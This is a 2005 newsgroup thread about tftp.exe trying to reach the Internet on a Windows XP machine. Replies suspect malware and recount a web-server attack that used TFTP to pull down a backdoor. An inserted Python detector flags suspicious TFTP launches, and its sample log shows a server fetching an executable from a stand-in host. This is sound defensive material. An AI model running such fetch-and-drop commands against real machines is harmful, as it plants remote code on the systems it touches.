TFTP is Trying to Access Internet


Prabhat

Hi All,

I have Windows XP + SP1 with ZoneAlarm Latest Installed.

Sometimes ZoneAlarm alerts me that TFTP is trying to access the Internet. When I
verified the properties of TFTP.exe I found that it belongs to Microsoft, and
found info on the Internet that it is a limited version of the Microsoft FTP
client.

Why is that executable trying to access the Internet? Does that indicate that
some spyware exists on my PC? I have scanned my PC using MS AntiSpyware BETA
but no spyware was found. (I have AVG Antivirus installed.)

Please Suggest.

Thanks
Prabhat

Will Denny

Hi

That file is related to TCP/IP. Have you had any problems with any web
sites if you deny Internet access?

Daniel Crichton

Will wrote on Tue, 5 Jul 2005 13:34:38 +0100:
| Hi
|
| That file is related to TCP/IP. Have you had any problems with any web
| sites if you deny Internet access?
|
| --
|
| Will Denny
| MS-MVP Windows Shell/User
| Please reply to the News Groups

That file is the Trivial File Transfer Protocol program that comes with
Windows. Its only relation to TCP/IP is that it uses TCP/IP to connect to
TFTP servers.

Most likely there's malware on the machine trying to use it to download
files from a TFTP server. The only time I've ever seen it in use was on a
test web server I had running that suffered from a buffer overflow hack on
its web server software (which incidentally wasn't IIS), and the TFTP
program was launched by the attack to download an executable which would
have opened a "backdoor" into the server (which would have been prevented by
the hardware firewall in place anyway). After sending it to NAI and
Kaspersky, it was determined that the TFTP connection had been interrupted, so
the executable was incomplete, but enough of it was present for them to be
able to make an analysis and put out signatures. Never had this return
either, as the web server software was fixed soon afterwards.

Dan
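The scenario Dan describes, a server process being made to launch tftp.exe to pull down an executable, is something a defender can look for in process-creation logs. The following is an added example, not code from any poster in this thread: it flags tftp.exe launches whose parent is not an interactive shell, or whose command line fetches an executable. The log layout (`parent=`, `image=`, `cmd=`, `user=` fields) and the sample lines are constructed for this example and do not correspond to any product's real format; the tftp.exe command syntax `tftp [-i] host [GET | PUT] source [destination]` is the documented Windows client syntax.

```python
"""Flag suspicious tftp.exe launches in process-creation logs.

Added example for this thread, not part of the original posts. The log lines
and field layout below are constructed assumptions, not any vendor's format.
"""
import re
from dataclasses import dataclass, field

# Parent processes with a plausible reason to launch tftp.exe on a desktop:
# an interactive shell or the user's own Explorer session. A server process
# spawning it (the scenario Dan describes) is the pattern worth alerting on.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}

# Extensions a downloaded file would have if it were a dropped executable.
EXECUTABLE_EXT = re.compile(r"\.(exe|dll|scr|com|bat|cmd)$", re.IGNORECASE)

# Assumed log layout (constructed, not a real product's format):
#   <date> <time> parent=<path> image=<path> cmd="<command line>" user=<name>
LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+)\s+parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+'
    r'cmd="(?P<cmd>[^"]*)"\s+user=(?P<user>\S+)$'
)


@dataclass
class Finding:
    ts: str
    parent: str
    cmd: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.reasons)


def basename(path):
    """Last path component, lower-cased, for Windows-style paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(line):
    """Return a Finding for a tftp.exe launch, or None for any other line."""
    m = LINE_RE.match(line)
    if not m or basename(m["image"]) != "tftp.exe":
        return None
    parent = basename(m["parent"])
    finding = Finding(m["ts"], parent, m["cmd"])
    if parent not in INTERACTIVE_PARENTS:
        finding.reasons.append(f"launched by non-interactive parent {parent}")
    # Windows tftp syntax: tftp [-i] host [GET | PUT] source [destination]
    tokens = m["cmd"].split()
    upper = [t.upper() for t in tokens]
    if "GET" in upper:
        i = upper.index("GET")
        files = tokens[i + 1:i + 3]  # source and optional destination
        dropped = [f for f in files if EXECUTABLE_EXT.search(f)]
        if dropped:
            finding.reasons.append(f"fetches executable {dropped[-1]}")
    return finding


def scan(lines):
    """Return only the suspicious findings from an iterable of log lines."""
    return [f for f in map(analyze, lines) if f and f.suspicious]


# Constructed sample log (192.0.2.0/24 is the documentation address range).
SAMPLE_LOG = [
    # A user-driven firmware fetch from Explorer: benign.
    r'2005-07-05 13:30:01 parent=C:\WINDOWS\explorer.exe image=C:\WINDOWS\system32\tftp.exe '
    r'cmd="tftp -i 192.0.2.10 GET firmware.bin" user=PC\Prabhat',
    # A web server spawning tftp.exe to fetch an .exe into Temp: the pattern Dan saw.
    r'2005-07-05 13:34:38 parent=C:\web\httpd.exe image=C:\WINDOWS\system32\tftp.exe '
    r'cmd="tftp -i 192.0.2.99 GET svc.exe C:\WINDOWS\Temp\svc.exe" user=SYSTEM',
    # Unrelated ftp.exe use: ignored.
    r'2005-07-05 13:35:00 parent=C:\WINDOWS\explorer.exe image=C:\WINDOWS\system32\ftp.exe '
    r'cmd="ftp ftp.example.net" user=PC\Prabhat',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.ts, f.parent, "|", f.cmd, "|", "; ".join(f.reasons))
```

Run as written, only the second sample line is reported, with both reasons attached. The parent allow-list is the assumption to tune: on a host where a vendor updater legitimately drives tftp.exe, add that updater's image name rather than suppressing the rule.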

David H. Lipman

From: "Prabhat" <[email protected]>

| Hi All,
|
| I have Windows XP + SP1 with ZoneAlarm Latest Installed.
|
| Sometimes ZoneAlarm alerts me that TFTP is trying to access the Internet. When I
| verified the properties of TFTP.exe I found that it belongs to Microsoft, and
| found info on the Internet that it is a limited version of the Microsoft FTP
| client.
|
| Why is that executable trying to access the Internet? Does that indicate that
| some spyware exists on my PC? I have scanned my PC using MS AntiSpyware BETA
| but no spyware was found. (I have AVG Antivirus installed.)
|
| Please Suggest.
|
| Thanks
| Prabhat
|

Dump the contents of the IE Temporary Internet Folder cache (TIF)
Start --> Settings --> Control Panel --> Internet Options --> Delete Files

Dump the contents of the Mozilla FireFox Cache { if you use FireFox }
Tools --> Options --> Privacy --> Cache --> Clear

Download MULTI_AV.EXE from the URL --
http://www.ik-cs.com/programs/virtools/Multi_AV.exe

It is a self-extracting ZIP file that contains the Kixtart Script Interpreter {
http://kixtart.org Kixtart is CareWare } three batch files, five Kixtart scripts, one Link
(.LNK) file, this PDF instruction file and two utilities; UNZIP.EXE and WGET.EXE. It will
simplify the process of using up to 3 different Anti Virus Command Line Scanners to remove
viruses and various other malware.

C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS }
This will bring up the initial menu of choices and should be executed in Normal Mode. This
way all the components can be downloaded from each AV vendor's web site.
The choices are: Sophos, Trend, McAfee, Exit the menu and Reboot the PC.

You can choose to go to each menu item and just download the needed files or you can
download the files and perform a scan in Normal Mode. Once you have downloaded the files
needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
during boot] and re-run the menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
file.

To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close

Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }

NOTE: You may have to disable your software FireWall or allow WGET.EXE and/or FTP.EXE to go
through your FireWall to allow them to download the needed AV vendor related files.

* * * Please report back your results * * *

Prabhat

| That file is related to TCP/IP. Have you had any problems with any web
| sites if you deny Internet access?

Hi, every time it asks permission to connect to the Internet I deny it. But I never
had any problem, and later I set the rule in ZoneAlarm to deny every time.
But I just wanted to know: if I have not requested it, then how will it connect
to any FTP server?

Prabhat

Hi David,

Thanks for the info. I will use the script and verify the system. But I have
scanned my system once using NAV 2005 with no result, while recently I used AVG
(which I am currently using) and was able to find one virus on my PC.

Thanks
Prabhat

David H. Lipman

From: "Prabhat" <[email protected]>

| Hi David,
|
| Thanks for the info. I will use the script and verify the system. But I have
| scanned my system once using NAV 2005 with no result, while recently I used AVG
| (which I am currently using) and was able to find one virus on my PC.
|
| Thanks
| Prabhat


There is no OS reason to use TFTP unless you are specifically doing it for a reason such as
using it in a BootP/TFTP process, such as configuring network devices such as an Ethernet
switch, router or print server. Therefore malware is presumed and is highly likely.

George Hester

tftp can be a security risk. If it is attempting to access the Internet
then yes, I'd say you have a problem. You cannot remove that file, for if you
do you will have System File errors. The file is necessary. If you want to
stop it from accessing the Internet, remove all NTFS permissions from it, and
I mean all. When you apply updates to Windows XP you may have to re-enable
those permissions first by checking Allow permissions to propagate to it.
Then remove them when you are done. Don't worry if you forget; Windows will
give you the option to fix the problem, and you know what the problem is.

David H. Lipman

From: "Kelly" <[email protected]>

| The Windows firmware update program "tftp.exe", supplied by Linksys and UMAX
| as part of their firmware update .exe files. More info on Security listed
| here:
| http://www.practicallynetworked.com/support/tftp_problem.htm
|
| --
|
| All the Best,
| Kelly (MS-MVP)
| Troubleshooting Windows XP

In reference to that URL, storing the router's password as clear text in the TFTP client is
hardly a problem if the following are set...

"Block WAN request" -- Enabled
"Remote Management" -- Disabled
"Remote Upgrade" -- Disabled.

However I truly doubt that the OP's problem has anything to do with the TFTP client that
comes with a router's firmware; it is the TFTP client that comes with the OS that is
being used, as indicated in the OP's problem.

And I disagree with George's assessment - "You cannot remove that file for if you do you
will have System File errors. The file is necessary". I know of no known reason that
TFTP.EXE would be used in the Windows OS in a kernel functionality. It is a mere client
utility like FTP.EXE and is used by the Windows PC user as needed.

George Hester

Dave, all I ask you to do is try it. Remove the file if you want. Install a
Service Pack. It will reappear. Better yet, leave it alone. Remove the
permissions from it; it's almost the same thing, but isn't.

David H. Lipman

From: "George Hester" <[email protected]>

| Dave, all I ask you to do is try it. Remove the file if you want. Install a
| Service Pack. It will reappear. Better yet, leave it alone. Remove the
| permissions from it; it's almost the same thing, but isn't.
|
| --
| George Hester

Well if I delete or rename it, it gets restored. Even w/o installing a SP.
BTW: I am on Win2K and this happens.

I renamed the native TFTP.EXE and dropped a Linksys Read-Only TFTP.EXE file and it was still
auto-replaced.

So if you assert "it is necessary", then what is it used for?

George Hester

I don't know, and I agree having it at all is a security risk. It is a
System Protected file. sfc will gripe if it is not there, and if all
permissions are removed on it. But really, just leave it where it is.
Remove the permissions and you almost have it "not there." It avoids sfc
issues. It's easy to put it back in by allowing permissions to propagate to
it. That's my suggestion.